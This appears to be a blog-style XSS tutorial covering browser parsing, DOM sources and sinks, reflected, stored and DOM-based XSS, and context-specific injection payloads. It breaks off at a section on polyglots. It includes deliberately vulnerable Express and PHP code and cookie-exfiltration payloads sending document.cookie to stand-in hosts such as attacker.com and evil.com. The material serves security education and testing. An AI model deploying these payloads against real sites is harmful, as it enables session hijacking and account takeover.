Author ~ Elite Hacker 1337

"Maybe it's not about avoiding the crash. But it's about setting a breakpoint to find the flaw in the code, fix it, and carry on until we hit the next flaw. The quest to keep going, to always fight for footing. Maybe we're all just stumbling from the right questions to the wrong answers, or from the right answers to the wrong questions. It doesn't matter where you go or where you come from, as long as you keep stumbling. Maybe that's all it takes. Maybe that's as good as it gets."

~ Elliot Alderson

None

Cross-Site Scripting (XSS) vulnerabilities were first recognized in the late 1990s and officially named by Microsoft security engineers in early 2000. It is a security flaw where attackers inject malicious JavaScript into trusted websites, which then executes in a user's browser to steal data or hijack sessions.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

FOUNDATION

1.1 The Web Stack: How Browsers Think

Before you can exploit XSS, you need to understand the machine you're attacking. The browser is a complex runtime environment — understanding its internals is what separates script kiddies from researchers.

The Rendering Pipeline

When a user visits a URL, here's the sequence of events:

DNS Resolution
     │
     ▼
TCP Handshake (or TLS for HTTPS)
     │
     ▼
HTTP Request sent
     │
     ▼
Server responds with HTML
     │
     ▼
Browser Parsing Pipeline:
┌─────────────────────────────────────────────────────┐
│  HTML Parser  →  DOM Tree                           │
│  CSS Parser   →  CSSOM Tree                         │
│  JS Engine    →  Executes scripts                   │
│  Layout Engine → Render Tree → Paint → Composite    │
└─────────────────────────────────────────────────────┘

Why This Matters for XSS

The browser is a trust machine. It receives text over the network and executes parts of it as code. The HTML parser, CSS parser, and JavaScript engine all have different rules for what they consider "executable." XSS is fundamentally about tricking the browser into treating attacker-controlled data as code.

Browser Parsing Quirks (Critical Knowledge)

Browsers implement HTML5 parsing — but they're also built to handle broken HTML gracefully. This is a goldmine for attackers:

<!-- All of these execute JavaScript in browsers: -->
<script>alert(1)</script>
<SCRIPT>alert(1)</SCRIPT>          <!-- case insensitive -->
<scr\x00ipt>alert(1)</scr\x00ipt> <!-- null byte injection (old IE) -->
<script/src="data:,alert(1)">      <!-- malformed but parsed -->

The HTML parser has multiple states it transitions between. Understanding these states is the foundation of context-based injection.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.2 HTTP Deep Dive

HTTP is stateless text. Every XSS attack travels through HTTP.

Request Anatomy:

GET /search?q=hello&page=1 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 ...
Cookie: session=abc123; pref=dark
Referer: https://example.com/
Accept: text/html,application/xhtml+xml

Response Anatomy:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Lax
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self'

<!DOCTYPE html>
<html>
  <body>You searched for: hello</body>
</html>

Security-Relevant HTTP Headers

1. Content-Type
- Purpose: Tells the browser how to interpret the response body.
- XSS Relevance: Missing charset can lead to charset sniffing attacks.

2. X-Content-Type-Options: nosniff
- Purpose: Prevents MIME sniffing.
- XSS Relevance: Prevents JavaScript execution in unexpected contexts.

3. Content-Security-Policy
- Purpose: Restricts resource loading (scripts, images, etc.).
- XSS Relevance: Primary XSS mitigation tool.

4. Set-Cookie: HttpOnly
- Purpose: Prevents JavaScript from accessing the cookie.
- XSS Relevance: Mitigates session theft via XSS.

5. Set-Cookie: SameSite
- Purpose: Controls cross-site cookie sending.
- XSS Relevance: Mitigates CSRF chaining.

6. X-Frame-Options
- Purpose: Prevents iframe embedding.
- XSS Relevance: Mitigates clickjacking chains.

The Content-Type Trap

If a server returns user data with Content-Type: text/html without sanitization — that's reflected XSS. If it returns JSON with Content-Type: text/html, same problem. Many APIs have caused XSS bugs by accidentally setting the wrong content type.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.3 The DOM: The Attacker's Playground

The Document Object Model (DOM) is the browser's in-memory representation of a webpage — a tree of objects. JavaScript interacts with this tree.

document
├── html
│   ├── head
│   │   └── title ("My Page")
│   └── body
│       ├── div#container
│       │   ├── h1 ("Welcome")
│       │   └── p ("Hello, world!")
│       └── script

Dangerous DOM APIs (Source → Sink Model)

In DOM XSS, we think in terms of sources (where attacker data enters) and sinks (where data gets executed).

Sources (attacker-controlled input):

location.href          // Full URL
location.search        // Query string (?q=...)
location.hash          // Fragment (#...)
location.pathname      // URL path
document.referrer      // HTTP Referer header
window.name            // Persists across navigations
document.cookie        // Cookie values
postMessage data       // Cross-origin messaging
WebSocket data         // Incoming WS messages

Sinks (execution points):

// HTML execution sinks
element.innerHTML = attacker_data        // ⚠️ XSS
element.outerHTML = attacker_data        // ⚠️ XSS
document.write(attacker_data)            // ⚠️ XSS
document.writeln(attacker_data)          // ⚠️ XSS

// JavaScript execution sinks
eval(attacker_data)                      // ⚠️ XSS
setTimeout(attacker_data, 100)           // ⚠️ XSS (string form)
setInterval(attacker_data, 100)          // ⚠️ XSS (string form)
new Function(attacker_data)()            // ⚠️ XSS
element.setAttribute("onclick", data)    // ⚠️ XSS

// URL sinks
location.href = attacker_data            // ⚠️ javascript: XSS
location.assign(attacker_data)           // ⚠️ javascript: XSS
element.src = attacker_data              // ⚠️ in some contexts

// Relatively safe (text only):
element.textContent = attacker_data      // ✅ Safe
element.innerText = attacker_data        // ✅ Safe
element.setAttribute("class", data)      // ✅ Usually safe

The sourcesink flow is the mental model for all DOM XSS analysis.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

1.4 Same-Origin Policy (SOP)

The Same-Origin Policy is the browser's fundamental security boundary. Understanding it tells you what XSS actually buys an attacker.

Definition of "Same Origin"

Two URLs are same-origin if they share all three of:

  • Protocol (http vs https)
  • Host (example.com vs sub.example.com — different!)
  • Port (80 vs 8080 — different!)
https://example.com/page-a  ←→  https://example.com/page-b   ✅ SAME ORIGIN
https://example.com         ←→  http://example.com           ❌ DIFFERENT (protocol)
https://example.com         ←→  https://sub.example.com      ❌ DIFFERENT (host)
https://example.com:443     ←→  https://example.com:8443     ❌ DIFFERENT (port)

Why SOP Matters for XSS

Without SOP, any website could read your banking page's content. SOP prevents cross-origin reads. But here's the key insight:

XSS bypasses SOP entirely. Because the malicious script runs within the target origin, it is treated as same-origin code and can access everything that origin owns: cookies, localStorage, DOM content, API tokens.

This is why XSS is rated Critical — it grants the attacker the same privileges as the victim user within that origin.

CORS (Cross-Origin Resource Sharing)

CORS is a mechanism to relax SOP for specific use cases. Misconfigurations are often chained with XSS.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.5 Cookies, Sessions & Storage

These are the primary targets of XSS exploitation.

Cookies:

Set-Cookie: session=eyJhbGciOiJIUzI1NiJ9...; 
            Path=/; 
            Domain=example.com;
            Expires=Thu, 01 Jan 2026 00:00:00 GMT;
            HttpOnly;          ← JS cannot read this
            Secure;            ← HTTPS only
            SameSite=Lax       ← Sent on top-level navigation only

HttpOnly is the main defense against cookie theft via XSS. However:

  • Even with HttpOnly, XSS can use the session (make requests as the victim)
  • Not all cookies are HttpOnly (attacker can still steal non-HttpOnly ones)

localStorage and sessionStorage

// These are NEVER sent automatically to servers
// They CAN be read by JS — thus XSS can steal them

localStorage.getItem('auth_token')       // Persists across tabs/sessions
sessionStorage.getItem('csrf_token')     // Current tab only

Modern JWT-based apps often store tokens in localStorage — making them trivially stealable by any XSS payload.

The Session Hijacking Kill Chain:

Attacker injects XSS payload
         │
         ▼
Victim visits page → payload executes in victim's browser
         │
         ▼
Payload reads: document.cookie / localStorage.getItem('token')
         │
         ▼
Exfiltrates to: fetch('https://attacker.com/steal?c=' + document.cookie)
         │
         ▼
Attacker receives token → impersonates victim

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

1.6 JavaScript Execution Model

XSS is JavaScript injection. Understanding how JS executes is non-negotiable.

The Event Loop

Call Stack              ⟵ Executes current code
     │
     ▼
Web APIs                ⟵ setTimeout, fetch, addEventListener
     │
     ▼
Callback/Task Queue     ⟵ Completed async operations
     │
     ▼
Microtask Queue         ⟵ Promise callbacks (higher priority)
     │
     ▼
Event Loop              ⟵ Moves tasks from queue → stack when stack empty

Why This Matters

Some XSS payloads don't execute synchronously. For example, setTimeout(code, 0) schedules execution asynchronously — useful for bypassing some filters that analyze synchronous execution paths.

Prototype Chain (Critical for Advanced Attacks):

// Every object inherits from Object.prototype
// Prototype pollution can set up XSS preconditions

Object.prototype.innerHTML = '<img src=x onerror=alert(1)>'
// Now any code doing element[userInput] = something
// might trigger XSS if userInput is 'innerHTML'

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

2.1 Why XSS Exists

XSS exists because of a fundamental architectural tension in the web:

  1. Web applications are dynamic — they need to display user-provided content
  2. Browsers execute code embedded in HTML — they can't distinguish "data HTML" from "code HTML"
  3. Developers mix data and code — string concatenation of user input into HTML templates

The root cause is always the same: unescaped, attacker-controlled data reaches a rendering context that interprets it as executable code.

[User Input] ──────────────────────────────────────► [Browser Renders as Code]
              No sanitization / wrong sanitization

The trust hierarchy a browser uses:

Origin Server Code (fully trusted)
        │
        ▼
Embedded Scripts from CDN (trusted if explicitly allowed)
        │
        ▼
User-supplied data rendered as HTML (SHOULD NOT BE TRUSTED — but often is)

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

What is cross-site scripting (XSS)?

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

How does XSS work?

Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.

What are the types of XSS attacks?

There are three main types of XSS attacks. These are:

  • Reflected XSS, where the malicious script comes from the current HTTP request.
  • Stored XSS, where the malicious script comes from the website's database.
  • DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 1: Reflected XSS

Reflected XSS is named for what happens to your input: the server reflects it back at you in the response. You send something in a request — a query parameter, a form field, a header — and the server embeds it directly into the HTML it sends back, without storing it. The payload isn't saved anywhere; it only exists in that single response cycle.

How it Works:

  • The server takes user-supplied input and embeds it directly into the HTML response without sanitizing it.
  • The browser then parses and executes whatever ends up in the HTML, including injected scripts.

Step-by-Step Attack Anatomy:

  1. Craft — The attacker builds a malicious URL, e.g. https://example.com/search?q=<script>alert(1)</script>
  2. Deliver — The URL is sent to the victim via phishing email, a shortened link, or a social media post.
  3. Click — The victim clicks the link; their browser sends a GET request with the malicious value in the query string.
  4. Reflect — The server embeds the unsanitized input into the HTML response and sends it back.
  5. Parse — The browser parses the HTML, hits the <script> tag, and transitions into Script data state.
  6. Executealert(1) runs in the context of example.com, with full same-origin access to the page.

Source and Sink Analysis:

These two terms will follow you throughout your entire career, so understand them precisely.

A source is where attacker-controlled data enters the application. In reflected XSS, the classic sources are query parameters (?q=...), POST body fields, HTTP headers (User-Agent, Referer, X-Forwarded-For — anything the server echoes back), and path segments (/user/ATTACKER_INPUT/profile).

A sink is where that data ends up being rendered or executed. In reflected XSS, the sink is typically the server-side template or code that interpolates your input into the HTML response. The server is doing something like this:

<?php
// The SOURCE: attacker-controlled data entering the application
$query = $_GET['q'];

// The SINK: that data being written into the HTML response without encoding
echo "<div class='results'>You searched for: " . $query . "</div>";
?>

The distance between source and sink is called the taint flow. In simple cases the flow is direct — input goes straight to output. In complex applications the flow passes through functions, databases, template engines, and multiple files. Learning to trace taint flow through a codebase is the core skill of secure code review, which we'll cover in next chapter's. For now, focus on the direct case.

Why Reflected XSS Is Still Critical ?

A common misconception is that reflected XSS is "less serious" than stored XSS because the payload isn't persistent. This is wrong. If an attacker can craft a URL that executes JavaScript in a victim's browser, they can steal sessions, perform account takeovers, and do anything JavaScript can do. The delivery mechanism is different — it requires the victim to click a link — but the impact is identical. Bug bounty platforms pay high severity for reflected XSS on sensitive applications all the time.

Real-World Reflected XSS Trigger Points:

  • Search bars
  • Error messages ("User 'X' not found")
  • Form validation feedback
  • URL path reflections (e.g., /users/<name>)
  • HTTP header reflections (User-Agent, Referer shown in admin panels)
  • 404 pages that reflect the requested URL

A Vulnerable Node.js Example:

Study this vulnerable Express application carefully.

const express = require('express');
const app = express();

app.get('/search', (req, res) => {
    // SOURCE: user input from the query string
    const searchTerm = req.query.q;
    
    // SINK: input interpolated directly into the HTML template string
    // Notice: no sanitization, no encoding, no escaping whatsoever
    const html = `
        <!DOCTYPE html>
        <html>
        <head><title>Search</title></head>
        <body>
            <form method="GET" action="/search">
                <input type="text" name="q" value="${searchTerm}">
                <button type="submit">Search</button>
            </form>
            <div class="results">
                You searched for: ${searchTerm}
            </div>
        </body>
        </html>
    `;
    
    res.setHeader('Content-Type', 'text/html');
    res.send(html);
});

app.listen(3000);

Before I walk you through the exploitation, I want you to notice something important: there are actually two injection points in this page, not one. The searchTerm variable appears in two different places in the HTML template, and those two places are in different contexts. This is exactly the kind of thing a real security researcher spots immediately.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 2: Stored XSS

Stored XSS (also called persistent XSS or second-order XSS) is when the attacker's payload is saved to the server — in a database, a file, a log, anywhere — and then later retrieved and rendered to other users.

The payload doesn't need to be delivered via a link. It waits, silently, until a victim loads the page that fetches and renders it.

The canonical example is a comment section. An attacker posts a comment containing <script>document.location='https://evil.com/steal?c='+document.cookie</script>.

The server saves this to the database. Every user who loads the comments page from that point forward executes the attacker's script. One injection, unlimited victims.

Why Stored XSS Is More Powerful ?

  • The escalation potential of stored XSS is significantly higher than reflected XSS for several reasons.
  • First, there's no phishing required — the victim just has to visit a legitimate page they'd visit anyway.
  • Second, you can target specific users; if the stored payload only appears on the admin panel, only administrators trigger it.
  • Third, stored XSS in an admin panel can lead to complete application compromise, because administrators have the highest privileges. A stored XSS that fires when an admin reviews flagged content can create new admin accounts, modify application settings, or dump user data via authenticated API calls.

Anatomy of a Stored XSS Vulnerability:

// POST /api/comments — stores user input
app.post('/api/comments', async (req, res) => {
    const { username, comment } = req.body;
    
    // FIRST SINK: writing to the database
    // If the database stores the raw payload, it will come back out raw
    await db.query(
        'INSERT INTO comments (username, comment) VALUES (?, ?)',
        [username, comment]  // Parameterized query prevents SQL injection,
                             // but does NOTHING to prevent XSS on output
    );
    res.json({ success: true });
});

// GET /comments — retrieves and renders comments
app.get('/comments', async (req, res) => {
    const comments = await db.query('SELECT * FROM comments');
    
    // SECOND SINK (the dangerous one): rendering stored data into HTML
    // The attacker's payload, stored in the database, now flows back out
    const commentsHTML = comments.map(c => 
        `<div class="comment">
            <strong>${c.username}</strong>: ${c.comment}
         </div>`
    ).join('');
    
    res.send(`<html><body>${commentsHTML}</body></html>`);
});

Notice that the SQL query uses parameterized statements, which is correct and prevents SQL injection.

Many developers make the mistake of thinking parameterized queries also prevent XSS. They don't. The SQL layer and the HTML layer are completely separate. The parameterized query ensures the comment is stored as text faithfully — including all the <script> tags. When that text is later embedded into HTML without encoding, XSS fires.

Real-World Stored XSS Trigger Points:

  • User profile fields (bio, display name, avatar URL)
  • Comment systems / forums
  • Support tickets (often viewed by admins = privilege escalation)
  • Product reviews
  • Chat applications
  • Log viewers in admin panels
  • Webhook/API response displays

Attack Flow:

1. Attacker submits payload to comments/profile/forum:
   <script>new Image().src='https://attacker.com/x?'+document.cookie</script>

2. Server stores payload in database

3. Every user who views the page executes the payload

4. Mass cookie exfiltration → attacker can hijack any session

Trigger Conditions:

An important concept with stored XSS is that the payload doesn't necessarily fire for the person who injected it, and it doesn't fire immediately. It fires when a victim loads the page that renders the stored data. This means your payload must survive the round-trip to the database and back without being mangled. If the database truncates strings, strips certain characters, or if a cron job sanitizes stored content, your payload might not survive. Part of testing stored XSS is verifying exactly what the application stores vs. what it retrieves.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 3: DOM-Based XSS

DOM-based XSS is fundamentally different from reflected and stored XSS in one critical way: the server is innocent.

The server sends a perfectly safe HTML response. The malicious payload never touches the server at all. The vulnerability lives entirely in client-side JavaScript — code that reads from a source and writes to a sink without sanitizing in between.

This makes DOM-based XSS harder to find (you can't spot it by reading server code), harder to detect (server-side scanners won't see it), and increasingly common in modern single-page applications that do heavy client-side rendering.

The Taint Flow, Client-Side:

The server sends this to the browser — perfectly clean HTML:

<!DOCTYPE html>
<html>
<head><title>Welcome</title></head>
<body>
    <div id="greeting"></div>
    
    <script>
        // SOURCE: reading from the URL fragment (location.hash)
        // The fragment (everything after #) is NEVER sent to the server
        // The server literally cannot see this value
        const name = location.hash.slice(1); // removes the leading '#'
        
        // SINK: writing directly into the DOM via innerHTML
        // innerHTML parses its argument as HTML, so script tags execute
        document.getElementById('greeting').innerHTML = 'Hello, ' + name;
    </script>
</body>
</html>

Common DOM XSS Patterns:

// Pattern 1: URL fragment to innerHTML
document.querySelector('#out').innerHTML = location.hash.slice(1);

// Pattern 2: URL parameter to eval
eval(new URLSearchParams(location.search).get('callback'));

// Pattern 3: postMessage without origin check
window.addEventListener('message', (e) => {
    document.body.innerHTML = e.data; // No origin check!
});

// Pattern 4: document.write with URL
document.write('<script src="' + location.search.split('src=')[1] + '"></script>');

// Pattern 5: jQuery .html() with URL data
$('#content').html(getUrlParam('content'));

Attack Flow:

https://victim.com/welcome#<img src=x onerror=alert(document.cookie)>

The server only sees: GET /welcome HTTP/1.1 — the # fragment is never sent to the server. Traditional server-side scanners miss this entirely.

Why DOM XSS is Harder to Find

  • Requires JavaScript analysis, not just response scanning
  • Fragment (#) is never sent to server
  • Often triggered by complex user interactions
  • Requires understanding data flow through the entire JS codebase

If an attacker sends a victim the URL https://example.com/welcome#<img src=x onerror=alert(1)>, here is exactly what happens step by step.

  • The browser requests https://example.com/welcome — note that the #<img src=x onerror=alert(1)> fragment is not sent to the server.
  • The server responds with the clean HTML above. The browser parses the HTML and begins executing the script. location.hash returns #<img src=x onerror=alert(1)>. .slice(1) removes the #, leaving <img src=x onerror=alert(1)>.
  • This string is assigned to the innerHTML property of the greeting div. The browser parses that string as HTML, creating an <img> element with src="x". The image fails to load. The onerror handler fires. alert(1) executes.

The server's access logs show nothing suspicious. The server sent a clean response. The vulnerability is entirely in the client-side JavaScript.

Why innerHTML Is So Dangerous ?

  • The innerHTML property is a sink because when you assign a string to it, the browser parses that string as HTML — running it through the full tokenizer, including state transitions into Script data state for <script> tags, and executing event handlers on elements. It's equivalent to asking the parser to process untrusted content.
  • Contrast this with textContent or innerText. These properties treat their argument as plain text — no HTML parsing, no state machine transitions, no execution. Assigning <script>alert(1)</script> to textContent simply displays those characters literally on the page. This is the correct way to insert user-controlled text into the DOM.

The single most important defensive principle in DOM-based XSS is: never use innerHTML with untrusted data; use textContent instead.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 4: Context-Based Injection

This is the chapter that separates real XSS researchers from script kiddies.

The injection context determines everything — what payload shape you need, what characters are meaningful, and what you have to close before you can open something executable.

I'm going to treat each context as a separate chapter because each one has its own parser with its own rules.

Context 1: HTML Body Context

This is the simplest context. Your input lands between HTML tags, in the text content of the document. The tokenizer is in Data state when it processes your input.

<p>User said: INJECTION_POINT</p>

In Data state, the meaningful character is < — it causes a transition to Tag open state, which is the gateway to injecting new HTML elements. Since you're in an unrestricted text node, you can inject any HTML you like, including <script> tags and elements with event handlers.

The payload family for this context includes <script>alert(1)</script>, <img src=x onerror=alert(1)>, <svg onload=alert(1)>, and many others. The principle is the same for all of them: you're in Data state, < transitions to tag parsing, and from there you introduce an element that causes JavaScript execution.

Context 2: HTML Attribute Context — Quoted

This is one of the most common real-world contexts, and it's also where many beginners get confused. Your input lands inside an HTML attribute value that's wrapped in quotation marks:

<input type="text" value="INJECTION_POINT">

The tokenizer is in Attribute value (double-quoted) state. In this state, < does NOT cause a transition to tag parsing — it's treated as a literal character. The only meaningful character is ", which closes the attribute value. After closing the attribute, you're in Before attribute name state, where you can inject new attributes including event handlers.

Think about what this means for payload construction. You cannot simply inject <script>alert(1)</script> here, because the < won't be treated as a tag boundary — the tokenizer is in attribute context, not Data state. Instead, you need to first break out of the attribute context, then inject executable content.

The payload shape for a double-quoted attribute context looks like:

" autofocus onfocus="alert(1)

Let me trace through exactly what the tokenizer sees when this is embedded into the template. The full HTML becomes:

<input type="text" value="" autofocus onfocus="alert(1)">

The first " in the payload closes the value attribute. autofocus is a new attribute that causes the element to receive focus automatically on page load. onfocus="alert(1)" is an event handler — when the element receives focus (which autofocus forces), alert(1) executes. The trailing " comes from the template's original closing quote, which now closes the onfocus attribute.

Notice I didn't need a <script> tag at all. I worked entirely within the attribute-based model of HTML execution.

For a single-quoted attribute context:

<input type="text" value='INJECTION_POINT'>

The closing character changes to ', so the payload becomes ' autofocus onfocus='alert(1).

Context 3: HTML Attribute Context — Unquoted

This is the most permissive attribute context. When a developer writes:

<input type=text value=INJECTION_POINT>

There are no quotes delimiting the attribute value. In Attribute value (unquoted) state, the tokenizer terminates the value on any ASCII whitespace character, or on >. This means you can escape the attribute value with just a space:

x onfocus=alert(1) autofocus

This produces <input type=text value=x onfocus=alert(1) autofocus> — valid HTML that executes alert(1) when focused. You didn't even need a quote character.

Context 4: JavaScript String Context (Inside Script Block)

This is where things get more nuanced and more interesting. Your input lands inside an existing <script> block, inside a string literal:

<script>
    var username = 'INJECTION_POINT';
    console.log('Hello, ' + username);
</script>

You're already inside Script data state — the JavaScript engine is processing everything here. Your goal is not to inject HTML but to break out of the JavaScript string and inject new JavaScript statements.

The meaningful character here is ' (or " or ` depending on how the string is delimited).

The payload shape is:

';alert(1);//

What the JavaScript engine sees after injection:

var username = '';alert(1);//';
console.log('Hello, ' + username);

The first ' closes the string literal. The ; terminates the var statement. alert(1) is a new, complete statement. // begins a single-line comment, which consumes the rest of the original line including the dangling ' that would otherwise cause a syntax error. The script executes cleanly.

This is a different mental model from HTML injection. You're not dealing with an HTML parser state machine; you're dealing with the JavaScript parser's lexer. The rules are different, the delimiters are different, and the bypass techniques are different.

Context 5: JavaScript Context (Inside Event Handler Attribute)

<button onclick="doSomething('USER_INPUT_HERE')">Click</button>
// Input:
'); alert(1); ('
// Result:
<button onclick="doSomething(''); alert(1); ('')">Click</button>

Context 6: URL Context

Your input lands inside a URL attribute:

<a href="INJECTION_POINT">Click me</a>
<iframe src="INJECTION_POINT"></iframe>

URL attributes are special because the browser processes the URL before navigating. For href on an anchor tag, the browser will navigate to that URL when clicked. The dangerous payload here is the javascript: URI scheme. If the attacker can inject javascript:alert(1) as the href value, clicking the link executes JavaScript in the page's context:

<a href="javascript:alert(1)">Click me</a>

This is a significant issue in many applications that store and render user-supplied URLs. The defense is to only allow https:// and http:// schemes, rejecting javascript:, data:, vbscript:, and others.

If the injection is inside a quoted attribute that contains a URL, you may also be able to break out of the URL context entirely into attribute context, falling back to the quoted-attribute payload pattern from Context 2.

Context 7: JavaScript Template Literal Context

Modern JavaScript uses template literals delimited by backticks. If your input lands inside one:

<script>
    const greeting = `Hello, INJECTION_POINT!`;
    document.getElementById('msg').textContent = greeting;
</script>

The closing character is ` (backtick). The payload to break out and inject is:

`;alert(1);//

Template literals also support ${expression} interpolation. If the application uses server-side template rendering and a user's input ends up inside a ${} block, you may be able to close the interpolation and inject code without needing the backtick at all.

Context 8: CSS Context

If your input lands inside a <style> block or a style attribute:

<div style="color: INJECTION_POINT">Hello</div>

In modern browsers, CSS-based XSS is largely mitigated. However, in older browsers (IE especially), CSS supported expression() which allowed JavaScript execution.

In modern browsers, the attack vector shifts to using CSS to exfiltrate data (CSS attribute selectors combined with a listening server) or UI redressing attacks. For the purposes of XSS exploitation, CSS context is the least useful, but you must recognize it and understand why injection there is still a security issue.

Context 9: JSON Inside Script Tags

Many applications embed server-generated data directly into a page as JSON:

<script>
    var config = {"username": "INJECTION_POINT", "theme": "dark"};
</script>

If the server doesn't JSON-encode the value, an attacker can inject out of the JSON structure and into the JavaScript context:

", "xss": "};alert(1);//

This produces:

<script>
    var config = {"username": "", "xss": "};alert(1);//", "theme": "dark"};
</script>

The } closes the object literal. ; terminates the var statement. alert(1) executes. // comments out the remainder.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

Chapter 5: DOM Sinks Catalogue

A sink is where data lands and causes execution. You need to know these by heart because when you're reading JavaScript source code looking for vulnerabilities, these are the patterns your eyes should lock onto.

1. innerHTML and outerHTML — Assign a string and the browser parses it as HTML. Any HTML including event handlers or script tags executes. This is the most common DOM XSS sink.

2. document.write and document.writeln — These write directly to the document stream. If called with attacker-controlled content, it can inject arbitrary HTML including <script> tags.

3. eval() — Passes a string directly to the JavaScript engine for execution. If attacker-controlled data reaches eval(), that's arbitrary JavaScript execution. Also watch for Function(), setTimeout(string, ...), and setInterval(string, ...) — they all evaluate strings as code.

4. location.href, location.assign(), location.replace() — Assigning a javascript: URI to any of these causes JavaScript execution.

5. element.src on script elements — Setting the src attribute of a dynamically created script element loads and executes an external script. If the attacker controls the URL, they load their own script file.

6. jQuery's .html(), .append(), .prepend() — These are innerHTML-equivalent in jQuery and are very common in legacy codebases. .html('<img onerror=alert(1) src=x>') executes.

7. Angular's [innerHTML] binding — Similar to raw innerHTML, though Angular applies its own sanitizer (DOMSanitizer) in some versions.

8. postMessage handlers that sink to innerHTML — A page might receive messages via window.addEventListener('message', ...) and write the received data to the DOM without validating the sender. This is a very common real-world DOM XSS pattern.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Chapter 6: DOM Sources Catalogue

A source is where attacker-controlled data enters the client-side JavaScript flow.

1. location.hash — The fragment identifier (everything after #) is never sent to the server. This makes it a stealthy source for DOM XSS that server-side scanners cannot detect. It's also persistent — the fragment survives page loads, so DOM XSS via location.hash is surprisingly persistent in single-page apps.

2. location.search — The query string (?key=value). Unlike location.hash, this is sent to the server, so server-side scanners can see it. But it's also used extensively by client-side routing in SPAs.

3. location.href — The full URL. If JavaScript reads location.href and processes it to extract parts, attacker-controlled portions (like the path, query, or fragment) flow in.

4. document.referrer — The URL of the page that linked to the current page. If an attacker can control where you navigate from, they can inject into document.referrer.

5. postMessage — Any origin can send a postMessage to any page. If the receiving page's message handler doesn't validate the event.origin and sinks the event.data into the DOM, the attacker can send malicious messages from their own page.

6. localStorage and sessionStorage — If an application stores data in localStorage and later reads and sinks it into the DOM, an attacker who has written to localStorage (perhaps via a previous XSS) can create a persistent second-stage payload.

7. WebSockets — If a WebSocket server echoes back data that a client sinks into the DOM, controlling the WebSocket messages (or compromising the WebSocket server) provides an XSS vector.

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

None
Here Comes The Next Level Techniques

EXPLOITATION

Chapter 1: Payload Crafting Methodology — Start From What the Parser Sees

Every professional XSS researcher follows a mental process when approaching a new injection point. The process isn't "try payloads from a list until one works." That approach fails against any non-trivial filter and teaches you nothing. The real process is a disciplined sequence of questions, each answered by reading the parser's output rather than guessing.

Step 0: The Canary Probe

Before crafting payloads, probe with a canary — a unique, obviously harmless string that lets you locate your input in the response:

Canary: xss4test'"<>/\`

In Burp Suite, search the response for xss4test and examine surrounding context. This tells you:

a. Is my input reflected?

b. How many times?

c. What HTML context am I in?

d. Are any characters encoded?

…………………………………………………………………………………………………………………………………..

  • Step one is reconnaissance, not exploitation: Before you send a single payload, you inject a completely harmless canary string — something unique and easily grep-able, like xsstest1234 — and observe exactly where it appears in the rendered page source. You're not trying to execute anything yet. You're asking the parser: where do you put me, and in what state are you when you get there?

Right-click the page, view source (not DevTools — view raw source), and search for your canary. When you find it, read the five lines around it carefully. Are you inside a tag? Inside quotes? Inside a script block? Inside an attribute value? That surrounding context tells you which tokenizer state the parser is in when it processes your input, and that determines everything that follows.

  • Step two is probing for meaningful characters: Once you know your context, you inject each of the context-sensitive special characters one at a time and observe what the server does with them. In an HTML body context, you test < and >. In a quoted attribute, you test " or '. In a JavaScript string, you test ', ", `, \, ;, and /. You're building a map of which characters survive and which ones are stripped, encoded, or blocked. This map is your filter model.
  • Step three is deriving the minimal payload: Given your context (step one) and your filter model (step two), you now know exactly what shape your payload must take. You know which characters you have available and which you don't. You construct the smallest payload that achieves execution given those constraints. Small payloads are better for two reasons: they're less likely to hit length limits, and they're easier to reason about when something breaks.
  • Step four is cleaning up syntax: After your payload executes — even if only in a test environment — you verify that you haven't left orphaned characters that would cause a JavaScript syntax error or malformed HTML. A payload that half-executes and then throws an error is a payload that might tip off a defender or leave forensic traces. A clean payload is a professional payload.

This four-step framework replaces payload lists. Internalize it.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Chapter 2: Polyglot Payloads — One Payload, Many Contexts

A polyglot payload is a single string that executes JavaScript correctly regardless of which context it's injected into — HTML body, quoted attribute, unquoted attribute, JavaScript string, or some combination. Understanding why polyglots work requires you to hold multiple parser state machines in your head simultaneously, which is exactly the exercise that sharpens your intuition.

A polyglot is a single payload that works across multiple injection contexts simultaneously. These are invaluable for automated scanning and for when you're unsure of the context.

Why polyglots exist ?

